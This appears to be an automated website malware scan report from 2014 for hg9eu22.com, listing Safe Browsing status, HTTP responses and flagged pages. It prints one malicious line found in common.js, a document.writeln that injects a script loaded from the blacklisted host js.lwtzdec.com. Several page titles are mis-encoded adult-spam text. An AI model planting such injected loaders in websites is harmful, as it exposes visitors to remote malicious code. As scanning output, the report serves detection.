Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hg9eu22.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hg9eu22.com/ | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 07:31:56 GMT Accept-Ranges: bytes ETag: "d07ba3d33cccf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 9909 Content-Location: http://hg9eu22.com/index.html Content-Type: text/html Last-Modified: Tue, 09 Sep 2014 13:36:26 GMT X-Powered-By: ASP.NET | clean |
http://hg9eu22.com/index.html | 200 OK Content-Length: 9909 Content-Type: text/html | clean |
http://hg9eu22.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://hg9eu22.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://hg9eu22.com/jdsjcrdy/ | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 07:31:58 GMT Accept-Ranges: bytes ETag: "4087abc33cccf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 23324 Content-Location: http://hg9eu22.com/jdsjcrdy/index.html Content-Type: text/html Last-Modified: Tue, 09 Sep 2014 13:36:24 GMT X-Powered-By: ASP.NET | clean |
http://hg9eu22.com/jdsjcrdy/index.html | 200 OK Content-Length: 23324 Content-Type: text/html | clean |
http://hg9eu22.com/mmtsyysq/ | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 07:32:00 GMT Accept-Ranges: bytes ETag: "a22e7c33cccf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 23277 Content-Location: http://hg9eu22.com/mmtsyysq/index.html Content-Type: text/html Last-Modified: Tue, 09 Sep 2014 13:36:24 GMT X-Powered-By: ASP.NET | clean |
http://hg9eu22.com/mmtsyysq/index.html | 200 OK Content-Length: 23277 Content-Type: text/html | clean |
http://hg9eu22.com/kbyzqstp/ | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 07:32:02 GMT Accept-Ranges: bytes ETag: "96a82ed33cccf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 23238 Content-Location: http://hg9eu22.com/kbyzqstp/index.html Content-Type: text/html Last-Modified: Tue, 09 Sep 2014 13:36:25 GMT X-Powered-By: ASP.NET | clean |
http://hg9eu22.com/kbyzqstp/index.html | 200 OK Content-Length: 23238 Content-Type: text/html | clean |
http://hg9eu22.com/kbyzqstp/03420140904.html | 200 OK Content-Length: 17070 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: myhtkj.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>µ£ÐÄСÔÆÃÃÃÃÏñÇïÉ«Ö®¿Õ»ÆÉ«Âþ»Â¡ÖØÄãÒªÏÈ˵»°¿ªÊ¼_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <met ...[4806 bytes skipped]... | ||
http://hg9eu22.com/jdsjcrdy/1220140903.html | 200 OK Content-Length: 17735 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jnyrb.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>ÄϺéÃÅ»ðÆ´ÎäÌÙÀ¼Î¢Î¢ÇÌÆðÀîåÐÒ£ÕâÈËÊܴ̼¤_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <meta name= ...[4804 bytes skipped]... | ||
http://hg9eu22.com/mmtsyysq/32620140906.html | 200 OK Content-Length: 18145 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: inweiai.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>°®²ÙµçÓ°ÍøÁéϬһµãͨºÜÄÑÏëÏó_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <meta name="keywords" co ...[4816 bytes skipped]... | ||
http://hg9eu22.com/kbyzqstp/93720140905.html | 200 OK Content-Length: 18068 Content-Type: text/html | clean |
http://hg9eu22.com/kbyzqstp/4420140906.html | 200 OK Content-Length: 17244 Content-Type: text/html | clean |
http://hg9eu22.com/kbyzqstp/4220140825.html | 200 OK Content-Length: 18196 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ycslmy.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>°àÖ÷ÈÎÀî·É¶ÏÚËûÃǼ¸¸öÀîåÐңƶ×ì_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <meta name="keywords ...[4822 bytes skipped]... | ||
http://hg9eu22.com/kbyzqstp/7120140823.html | 200 OK Content-Length: 18243 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 91ilove.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>ÌÛ°®×Ô¼ºÄÔº£Àï¿ÉÁ½ÌõÍȵ¹_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <meta name="keywords" conten ...[4847 bytes skipped]... | ||
http://hg9eu22.com/kbyzqstp/9520140908.html | 200 OK Content-Length: 17925 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: aboutmalls.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <title>ÀîåÐÒ£ÃÍȻվÆðËÓÐÔÚÏß¿´aƬµÄÍøÕ¾ÀîåÐÒ£Ò»ÑÛ_ÑÇÖÞɫͼߣһߣÉçÇø_Å·ÃÀ³ÉÈËÈËÌåÒÕÊõͼƬ_°¡Æ¬´óÈ«¡¾µÚһƷÅÆ¡¿</title> <meta name= ...[4817 bytes skipped]... | ||
http://hg9eu22.com/kbyzqstp/54720140905.html | 200 OK Content-Length: 17415 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hg9eu22.com
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 07:31:56 GMT
Accept-Ranges: bytes
ETag: "d07ba3d33cccf1:94a3"
Server: Microsoft-IIS/6.0
Content-Length: 9909
Content-Location: http://hg9eu22.com/index.html
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 13:36:26 GMT
X-Powered-By: ASP.NET
...9909 bytes of data.
GET / HTTP/1.1
Host: hg9eu22.com
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 07:31:56 GMT
Accept-Ranges: bytes
ETag: "d07ba3d33cccf1:94a3"
Server: Microsoft-IIS/6.0
Content-Length: 9909
Content-Location: http://hg9eu22.com/index.html
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 13:36:26 GMT
X-Powered-By: ASP.NET
...9909 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hg9eu22.com
Referer: http://www.google.com/search?q=hg9eu22.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hg9eu22.com
Referer: http://www.google.com/search?q=hg9eu22.com
Result:
The result is similar to the first query. There are no suspicious redirects found.